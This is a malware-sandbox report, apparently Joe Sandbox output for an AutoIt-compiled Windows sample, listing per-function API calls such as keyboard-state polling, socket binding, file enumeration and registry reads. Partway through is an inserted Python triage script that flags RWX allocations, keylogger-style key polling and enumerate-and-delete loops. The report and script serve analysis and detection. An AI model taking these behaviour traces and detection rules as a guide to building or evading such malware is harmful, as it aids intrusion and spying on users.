                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F0CB48
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00F0CB99
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00F0CC42
                                              • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00F0CCE1
                                              • RegCloseKey.ADVAPI32(00000000), ref: 00F0CCEE
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                              • String ID:
                                              • API String ID: 3102970594-0
                                              • Opcode ID: f52e9399646ba65e188a3af7a49128dd0a729cd09366f106747fca765c290858
                                              • Instruction ID: 81728084f19e460e28e8913f5298e8bcafd92a9444ba96780127e4455e8dedf5
                                              • Opcode Fuzzy Hash: f52e9399646ba65e188a3af7a49128dd0a729cd09366f106747fca765c290858
                                              • Instruction Fuzzy Hash: 00027F716042409FD714DF24C895E2ABBE5EF48314F18C59DF84ADB2A2DB31ED42EB91
                                              APIs
                                              • GetKeyboardState.USER32(?), ref: 00EEA572
                                              • GetAsyncKeyState.USER32(000000A0), ref: 00EEA5F3
                                              • GetKeyState.USER32(000000A0), ref: 00EEA60E
                                              • GetAsyncKeyState.USER32(000000A1), ref: 00EEA628
                                              • GetKeyState.USER32(000000A1), ref: 00EEA63D
                                              • GetAsyncKeyState.USER32(00000011), ref: 00EEA655
                                              • GetKeyState.USER32(00000011), ref: 00EEA667
                                              • GetAsyncKeyState.USER32(00000012), ref: 00EEA67F
                                              • GetKeyState.USER32(00000012), ref: 00EEA691
                                              • GetAsyncKeyState.USER32(0000005B), ref: 00EEA6A9
                                              • GetKeyState.USER32(0000005B), ref: 00EEA6BB
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: State$Async$Keyboard
                                              • String ID:
                                              • API String ID: 541375521-0
                                              • Opcode ID: 978df729b3342989cd7f9266a82466d6cb49ffd00127ee7f7dc0e81cd70c49ab
                                              • Instruction ID: dbee431fb4bf1963bbc02a0bc88117fac7748cda354bd1f7ade8383c703d4473
                                              • Opcode Fuzzy Hash: 978df729b3342989cd7f9266a82466d6cb49ffd00127ee7f7dc0e81cd70c49ab
                                              • Instruction Fuzzy Hash: 7A4195745047CE6EFF319B6188143A5BEA16F12348F0C906DD5C66A1C2EB94ADC8CB63
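The entries above are the raw material an analyst usually wants in structured form: which Win32 APIs each function calls, with what constant arguments, and whether the calling code lives in an image-backed region. As an added example that is not part of the Joe Sandbox report or of its IDA plugin, the following Python parses function entries written in exactly this format and applies three triage rules to them: a VirtualAlloc whose flProtect is PAGE_EXECUTE_READWRITE (0x40), issued from a region the report marks "based on PE: false"; repeated GetAsyncKeyState/GetKeyState polling of modifier keys; and a FindFirstFileW/FindNextFileW loop that also calls DeleteFileW. The sample text is constructed from lines shown on this page; the VK_* names and page-protection values are standard Win32 constants, and the flag names are this example's own labels, not Joe Sandbox signatures.

```python
"""Parse Joe Sandbox 'APIs' function entries and flag behaviours worth a second look."""
import re
from dataclasses import dataclass, field
from typing import List, Optional, Union

# Constructed sample: API lines copied from entries on this page, in the report's own layout.
SAMPLE = """\
APIs
  • Part of subcall function 00EEDB69: FindFirstFileW.KERNELBASE(?,?), ref: 00EEDBE0
  • Part of subcall function 00EEDB69: DeleteFileW.KERNELBASE(?,?,?,?), ref: 00EEDC30
  • Part of subcall function 00EEDB69: FindNextFileW.KERNEL32(00000000,00000010), ref: 00EEDC41
• GetLastError.KERNEL32 ref: 00EF6583
Memory Dump Source
• Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
APIs
• VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040,?,91AFCA54,00000000,012AABBB,0000003C,0000001E,0000004A,0000003E,00000042), ref: 012AAF77
Memory Dump Source
• Source File: 00000008.00000003.2324062632.00000000012A8000.00000004.00000020.00020000.00000000.sdmp, Offset: 012A8000, based on PE: false
APIs
• GetKeyboardState.USER32(?), ref: 00EEA572
• GetAsyncKeyState.USER32(000000A0), ref: 00EEA5F3
• GetKeyState.USER32(000000A0), ref: 00EEA60E
• GetAsyncKeyState.USER32(00000011), ref: 00EEA655
Memory Dump Source
• Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
"""

API_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+): )?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)
SRC_RE = re.compile(
    r"Source File:\s*(?P<file>\S+),\s*Offset:\s*(?P<off>[0-9A-Fa-f]+),\s*based on PE:\s*(?P<pe>true|false)"
)

# Standard Win32 constants used to decode the hex arguments printed in the report.
PAGE_EXECUTE_READWRITE = 0x40
MEM_COMMIT = 0x1000
VK_NAMES = {0xA0: "VK_LSHIFT", 0xA1: "VK_RSHIFT", 0x11: "VK_CONTROL", 0x12: "VK_MENU", 0x5B: "VK_LWIN"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Union[int, str, None]]
    ref: int
    subcall_of: Optional[int]  # address of the subcall function, when the line is indented under one


@dataclass
class FunctionEntry:
    calls: List[ApiCall] = field(default_factory=list)
    dump_file: str = ""
    offset: int = 0
    pe_backed: Optional[bool] = None  # the report's "based on PE" flag for the source region


def _parse_arg(tok: str):
    tok = tok.strip()
    if tok == "?":
        return None  # unresolved at analysis time
    try:
        return int(tok, 16)  # numeric arguments are printed as zero-padded hex
    except ValueError:
        return tok  # string literal such as *.*


def parse_entries(text: str) -> List[FunctionEntry]:
    """Split the text at each 'APIs' header and collect the calls and dump source of every entry."""
    entries, cur = [], None
    for line in text.splitlines():
        if line.strip() == "APIs":
            cur = FunctionEntry()
            entries.append(cur)
            continue
        if cur is None:
            continue
        m = API_RE.match(line)
        if m:
            args = [_parse_arg(a) for a in m["args"].split(",")] if m["args"] is not None else []
            cur.calls.append(ApiCall(m["api"], m["mod"], args, int(m["ref"], 16),
                                     int(m["sub"], 16) if m["sub"] else None))
            continue
        m = SRC_RE.search(line)
        if m:
            cur.dump_file, cur.offset, cur.pe_backed = m["file"], int(m["off"], 16), m["pe"] == "true"
    return entries


def triage(entry: FunctionEntry) -> List[str]:
    """Heuristic flags (this example's own labels) derived from one function entry."""
    findings = []
    names = {c.api for c in entry.calls}
    for c in entry.calls:
        # VirtualAlloc(lpAddress, dwSize, flAllocationType, flProtect)
        if c.api == "VirtualAlloc" and len(c.args) >= 4 and c.args[3] == PAGE_EXECUTE_READWRITE:
            tag = "rwx_alloc"
            if isinstance(c.args[2], int) and c.args[2] & MEM_COMMIT:
                tag += "_commit"
            if entry.pe_backed is False:
                tag += "_from_unbacked_region"  # the caller itself is not inside any mapped image
            findings.append(tag)
    polled = [c for c in entry.calls if c.api in ("GetAsyncKeyState", "GetKeyState")]
    if len(polled) >= 2:
        keys = sorted({VK_NAMES.get(c.args[0], hex(c.args[0]))
                       for c in polled if c.args and isinstance(c.args[0], int)})
        findings.append("key_state_polling:" + ",".join(keys))
    if {"FindFirstFileW", "FindNextFileW", "DeleteFileW"} <= names:
        findings.append("enumerate_and_delete")
    return findings


if __name__ == "__main__":
    for e in parse_entries(SAMPLE):
        print(hex(e.offset), e.pe_backed, triage(e))
```

The "based on PE: false" check is the one that matters most for the VirtualAlloc entries above: an RWX commit is common in packers and runtimes, but an RWX commit issued by code that the sandbox could not map back to any loaded image is the pattern of a stage that has already been unpacked into anonymous memory. The keyboard rule only reports modifier keys because those are what these entries poll; widen VK_NAMES if you apply it to other reports.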
                                              APIs
                                              • CoInitialize.OLE32 ref: 00F040D1
                                              • CoUninitialize.OLE32 ref: 00F040DC
                                              • CoCreateInstance.OLE32(?,00000000,00000017,00F20B44,?), ref: 00F04136
                                              • IIDFromString.OLE32(?,?), ref: 00F041A9
                                              • VariantInit.OLEAUT32(?), ref: 00F04241
                                              • VariantClear.OLEAUT32(?), ref: 00F04293
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                              • API String ID: 636576611-1287834457
                                              • Opcode ID: ad9b42e809fa54ba81979da31f69dc808c24538d17431b9f08396e266a672b53
                                              • Instruction ID: 0964cc11c77558f6dc8613ce2c54c1bc3337a798ce9e15f632b73a92280b4101
                                              • Opcode Fuzzy Hash: ad9b42e809fa54ba81979da31f69dc808c24538d17431b9f08396e266a672b53
                                              • Instruction Fuzzy Hash: 7A61A1B1604301AFC711DF64D848B5ABBE4AF49754F00454DFA85AB2D1D770FD84EB92
                                              APIs
                                                • Part of subcall function 00E8B25F: _wcslen.LIBCMT ref: 00E8B269
                                              • FindFirstFileW.KERNEL32(00000001,?,*.*,?,?,00000000,00000000), ref: 00EFA4D5
                                              • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00EFA5E8
                                                • Part of subcall function 00EF41CE: GetInputState.USER32 ref: 00EF4225
                                                • Part of subcall function 00EF41CE: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00EF42C0
                                              • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00EFA505
                                              • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00EFA5D2
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Find$File$CloseFirstInputMessageNextPeekSleepState_wcslen
                                              • String ID: *.*
                                              • API String ID: 1972594611-438819550
                                              • Opcode ID: 58f72b5e40896ec140a9dabc3d10226ab0de499513d796a36b71c8da2f9b2a9b
                                              • Instruction ID: d6435bd18ee5ae21cf03e0499c7a4968718e542a828b7b82431c94fce68b41e8
                                              • Opcode Fuzzy Hash: 58f72b5e40896ec140a9dabc3d10226ab0de499513d796a36b71c8da2f9b2a9b
                                              • Instruction Fuzzy Hash: 554151B190020EAFCF14EFA4C849AEEBBB4EF05314F145066E519BA191D770AE84DF52
                                              APIs
                                              • DefDlgProcW.USER32(?,?), ref: 00E822EE
                                              • GetSysColor.USER32(0000000F), ref: 00E823C3
                                              • SetBkColor.GDI32(?,00000000), ref: 00E823D6
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Color$Proc
                                              • String ID:
                                              • API String ID: 929743424-0
                                              • Opcode ID: c04669280e0901f1e14ccec824e084bde9a2b97fb611dd1d30967e47d340ccd2
                                              • Instruction ID: cef806c9a02c2825dccf7c707d24c51ad04afef648836151c8f26c1c59606527
                                              • Opcode Fuzzy Hash: c04669280e0901f1e14ccec824e084bde9a2b97fb611dd1d30967e47d340ccd2
                                              • Instruction Fuzzy Hash: DB8128F0204448BEEA28763C8D68FFF255DDB42304B15611EF34EF5692CA5A8E02E376
                                              APIs
                                                • Part of subcall function 00F039AB: inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00F039D7
                                                • Part of subcall function 00F039AB: _wcslen.LIBCMT ref: 00F039F8
                                              • socket.WSOCK32(00000002,00000002,00000011,?,?,00000000), ref: 00F021BA
                                              • WSAGetLastError.WSOCK32 ref: 00F021E1
                                              • bind.WSOCK32(00000000,?,00000010), ref: 00F02238
                                              • WSAGetLastError.WSOCK32 ref: 00F02243
                                              • closesocket.WSOCK32(00000000), ref: 00F02272
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: ErrorLast$_wcslenbindclosesocketinet_addrsocket
                                              • String ID:
                                              • API String ID: 1601658205-0
                                              • Opcode ID: bb527f915ff1742a8b4a45b7ffb5a4ca45bb418cd9cbdde86c9c9acf9ad0611e
                                              • Instruction ID: dbd48c81e19f2edb0b545749874c4c67fbcf2aa34a1ebb4ae5649ccca2be767a
                                              • Opcode Fuzzy Hash: bb527f915ff1742a8b4a45b7ffb5a4ca45bb418cd9cbdde86c9c9acf9ad0611e
                                              • Instruction Fuzzy Hash: A951C171A00200AFEB10AF64C88AF6A77E5AB45724F148088F959AF3D3D670ED41DBA1
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000008.00000002.2326568830.0000000000E81000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00E80000, based on PE: true
                                               • Associated: 00000008.00000002.2326552144.0000000000E80000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F1D000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326617747.0000000000F43000.00000002.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326658568.0000000000F4D000.00000004.00000001.01000000.0000000A.sdmp
                                               • Associated: 00000008.00000002.2326674932.0000000000F55000.00000002.00000001.01000000.0000000A.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_8_2_e80000_avqj.jbxd
                                              Similarity
                                              • API ID: Window$EnabledForegroundIconicVisibleZoomed
                                              • String ID:
                                              • API String ID: 292994002-0
                                              • Opcode ID: 4042a98ec7d7218c8aab6b2685fcea056cac790790314c2bc5b4b7617aaa6d26
                                              • Instruction ID: d9c4237b0d85f992ee275007730347e64c804b85e6123d69c8ae513b6568a39c
                                              • Opcode Fuzzy Hash: 4042a98ec7d7218c8aab6b2685fcea056cac790790314c2bc5b4b7617aaa6d26
                                              • Instruction Fuzzy Hash: F42127317002148FD7509F56C894B9A7BE5EF95324F1D806CE849CB291DB31ED82EB90
                                              APIs
                                              • mouse_event.USER32(00000800,00000000,00000000,00000088,00000000), ref: 00EEEC19
                                              Strings
                                              Similarity
                                              • API ID: mouse_event
                                              • String ID: DOWN
                                              • API String ID: 2434400541-711622031
                                              • Opcode ID: 6c54546514a606a065b6fb02897f5d6e38f3f15c34bb8150e7dab90b39939820
                                              • Instruction ID: 4b67bb1950038059aa5b455c84ace42107ee492ea2531f62a4514cfb7855603a
                                              • Opcode Fuzzy Hash: 6c54546514a606a065b6fb02897f5d6e38f3f15c34bb8150e7dab90b39939820
                                              • Instruction Fuzzy Hash: 99E08C6619DBBA38B90821697C02DF6438C8F6A338B616246FC00F83C0ED906D8260A9
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 00F10C44
                                              • _wcslen.LIBCMT ref: 00F10C7E
                                              • _wcslen.LIBCMT ref: 00F10CE8
                                              • _wcslen.LIBCMT ref: 00F10D50
                                              • _wcslen.LIBCMT ref: 00F10DD4
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00F10E24
                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00F10E63
                                                • Part of subcall function 00E9FD60: _wcslen.LIBCMT ref: 00E9FD6B
                                                • Part of subcall function 00EE2ACF: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00EE2AE8
                                                • Part of subcall function 00EE2ACF: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00EE2B1A
                                              Strings
                                              Similarity
                                              • API ID: _wcslen$MessageSend$BuffCharUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 1103490817-719923060
                                              • Opcode ID: ebcf83414d1e375e973b718d493021e1daa47bc8abf1534bc21c19c5b6a62718
                                              • Instruction ID: bc28a8dd0951e81964f813a78a1d931cf283b983ebf73ab1806975d75c02423f
                                              • Opcode Fuzzy Hash: ebcf83414d1e375e973b718d493021e1daa47bc8abf1534bc21c19c5b6a62718
                                              • Instruction Fuzzy Hash: BFE1C2326043418FC714EF24C4419AAB7E5FF99324B14495CF89AAB392DF70ED86EB91
                                              APIs
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E8259A
                                              • GetSystemMetrics.USER32(00000007), ref: 00E825A2
                                              • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 00E825CD
                                              • GetSystemMetrics.USER32(00000008), ref: 00E825D5
                                              • GetSystemMetrics.USER32(00000004), ref: 00E825FA
                                              • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00E82617
                                              • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00E82627
                                              • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 00E8265A
                                              • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00E8266E
                                              • GetClientRect.USER32(00000000,000000FF), ref: 00E8268C
                                              • GetStockObject.GDI32(00000011), ref: 00E826A8
                                              • SendMessageW.USER32(00000000,00000030,00000000), ref: 00E826B3
                                                • Part of subcall function 00E819CD: GetCursorPos.USER32(?), ref: 00E819E1
                                                • Part of subcall function 00E819CD: ScreenToClient.USER32(00000000,?), ref: 00E819FE
                                                • Part of subcall function 00E819CD: GetAsyncKeyState.USER32(00000001), ref: 00E81A23
                                                • Part of subcall function 00E819CD: GetAsyncKeyState.USER32(00000002), ref: 00E81A3D
                                              • SetTimer.USER32(00000000,00000000,00000028,00E8199C), ref: 00E826DA
                                              Strings
                                              Similarity
                                              • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                              • String ID: AutoIt v3 GUI
                                              • API String ID: 1458621304-248962490
                                              • Opcode ID: ca0d68251dbf8fc1dc570a099a6e1b288c1bce2ee0cb9eb32c44f545d8550c15
                                              • Instruction ID: 5d2c914b08c2e0975a2136d9be9e6715da3d4637b32baf57f647a30ed12812aa
                                              • Opcode Fuzzy Hash: ca0d68251dbf8fc1dc570a099a6e1b288c1bce2ee0cb9eb32c44f545d8550c15
                                              • Instruction Fuzzy Hash: 6FB1AB71A002099FDB04EFA8CD45BEE3BB5FB48315F119229FA19AB290DB70E941DF51
                                              APIs
                                              • _wcslen.LIBCMT ref: 00F18CB9
                                              • _wcslen.LIBCMT ref: 00F18CCD
                                              • _wcslen.LIBCMT ref: 00F18CF0
                                              • _wcslen.LIBCMT ref: 00F18D13
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00F18D51
                                              • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00F16551), ref: 00F18DAD
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F18DE6
                                              • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00F18E29
                                              • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F18E60
                                              • FreeLibrary.KERNEL32(?), ref: 00F18E6C
                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F18E7C
                                              • DestroyIcon.USER32(?,?,?,?,?,00F16551), ref: 00F18E8B
                                              • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F18EA8
                                              • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F18EB4
                                              Strings
                                              Similarity
                                              • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                              • String ID: .dll$.exe$.icl
                                              • API String ID: 799131459-1154884017
                                              • Opcode ID: 58ab8daec523eb9e39ba71b767af5b2885fa99eb2810cbf4fac9d93e16046506
                                              • Instruction ID: 9368cee76c56689f383a450d19e7d27318152e9ae5231c48fbf15497c364024e
                                              • Opcode Fuzzy Hash: 58ab8daec523eb9e39ba71b767af5b2885fa99eb2810cbf4fac9d93e16046506
                                              • Instruction Fuzzy Hash: B961D1B1900219BEEB14DFA4DD41BFE77A8BB09760F108506FC15E61D0DBB4A981EBA0
                                              APIs
                                              • CharLowerBuffW.USER32(?,?), ref: 00EF4852
                                              • _wcslen.LIBCMT ref: 00EF485D
                                              • _wcslen.LIBCMT ref: 00EF48B4
                                              • _wcslen.LIBCMT ref: 00EF48F2
                                              • GetDriveTypeW.KERNEL32(?), ref: 00EF4930
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF4978
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF49B3
                                              • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00EF49E1
                                              Strings
                                              Similarity
                                              • API ID: SendString_wcslen$BuffCharDriveLowerType
                                              • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                              • API String ID: 1839972693-4113822522
                                              • Opcode ID: c96a8ad3ea57cc2ad22906a81131fa37d1d1e3e80ec0317ede81676b8b67193b
                                              • Instruction ID: db92dbbe111be31e670e622089d2a80ec6dfd33f3a910da390771272bc963fa4
                                              • Opcode Fuzzy Hash: c96a8ad3ea57cc2ad22906a81131fa37d1d1e3e80ec0317ede81676b8b67193b
                                              • Instruction Fuzzy Hash: DB71C2B26047169FC710EF24C88097BB7E4EF94758F10592CF999A72A1EB30DD45CB91
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 00EE62BD
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00EE62CF
                                              • SetWindowTextW.USER32(?,?), ref: 00EE62E6
                                              • GetDlgItem.USER32(?,000003EA), ref: 00EE62FB
                                              • SetWindowTextW.USER32(00000000,?), ref: 00EE6301
                                              • GetDlgItem.USER32(?,000003E9), ref: 00EE6311
                                              • SetWindowTextW.USER32(00000000,?), ref: 00EE6317
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00EE6338
                                              • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00EE6352
                                              • GetWindowRect.USER32(?,?), ref: 00EE635B
                                              • _wcslen.LIBCMT ref: 00EE63C2
                                              • SetWindowTextW.USER32(?,?), ref: 00EE63FE
                                              • GetDesktopWindow.USER32 ref: 00EE6404
                                              • GetWindowRect.USER32(00000000), ref: 00EE640B
                                              • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00EE6462
                                              • GetClientRect.USER32(?,?), ref: 00EE646F
                                              • PostMessageW.USER32(?,00000005,00000000,?), ref: 00EE6494
                                              • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00EE64BE
                                              Similarity
                                              • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                              • String ID:
                                              • API String ID: 895679908-0
                                              • Opcode ID: 67f111bedc0ade5d9de7c7e9b3aa002403b2048c48918bff702446032d7e5b2e
                                              • Instruction ID: a76eb48c69f3eeb4c1d112c239cf7ad7eec2b2753653ea9738a45ceaaa4c34f4
                                              • Opcode Fuzzy Hash: 67f111bedc0ade5d9de7c7e9b3aa002403b2048c48918bff702446032d7e5b2e
                                              • Instruction Fuzzy Hash: ED719B31900749AFDB20DFA9CE45AAEBBF5FF58748F10492CE196B22A0D775E940DB10
                                              APIs
                                              • LoadCursorW.USER32(00000000,00007F89), ref: 00F00784
                                              • LoadCursorW.USER32(00000000,00007F8A), ref: 00F0078F
                                              • LoadCursorW.USER32(00000000,00007F00), ref: 00F0079A
                                              • LoadCursorW.USER32(00000000,00007F03), ref: 00F007A5
                                              • LoadCursorW.USER32(00000000,00007F8B), ref: 00F007B0
                                              • LoadCursorW.USER32(00000000,00007F01), ref: 00F007BB
                                              • LoadCursorW.USER32(00000000,00007F81), ref: 00F007C6
                                              • LoadCursorW.USER32(00000000,00007F88), ref: 00F007D1
                                              • LoadCursorW.USER32(00000000,00007F80), ref: 00F007DC
                                              • LoadCursorW.USER32(00000000,00007F86), ref: 00F007E7
                                              • LoadCursorW.USER32(00000000,00007F83), ref: 00F007F2
                                              • LoadCursorW.USER32(00000000,00007F85), ref: 00F007FD
                                              • LoadCursorW.USER32(00000000,00007F82), ref: 00F00808
                                              • LoadCursorW.USER32(00000000,00007F84), ref: 00F00813
                                              • LoadCursorW.USER32(00000000,00007F04), ref: 00F0081E
                                              • LoadCursorW.USER32(00000000,00007F02), ref: 00F00829
                                              • GetCursorInfo.USER32(?), ref: 00F00839
                                              • GetLastError.KERNEL32 ref: 00F0087B
                                              Similarity
                                              • API ID: Cursor$Load$ErrorInfoLast
                                              • String ID:
                                              • API String ID: 3215588206-0
                                              • Opcode ID: 623a06a0028edbf9f6966518e360402ca1aa4c9bfe231e7d9c7c489f2d5dcd9f
                                              • Instruction ID: 4b9d0a4e99adbcf6b3d14e7a4291ccca23b87d69c8330174480368f4cd9b7c07
                                              • Opcode Fuzzy Hash: 623a06a0028edbf9f6966518e360402ca1aa4c9bfe231e7d9c7c489f2d5dcd9f
                                              • Instruction Fuzzy Hash: 3A416670D043196ADB10DFB68C8995EBFE8FF04354B50852AE11CE7291DA74D901DF91
                                              APIs
                                              • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 00EA0456
                                                • Part of subcall function 00EA047D: InitializeCriticalSectionAndSpinCount.KERNEL32(00F5170C,00000FA0,9E2016E5,?,?,?,?,00EC2753,000000FF), ref: 00EA04AC
                                                • Part of subcall function 00EA047D: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,00EC2753,000000FF), ref: 00EA04B7
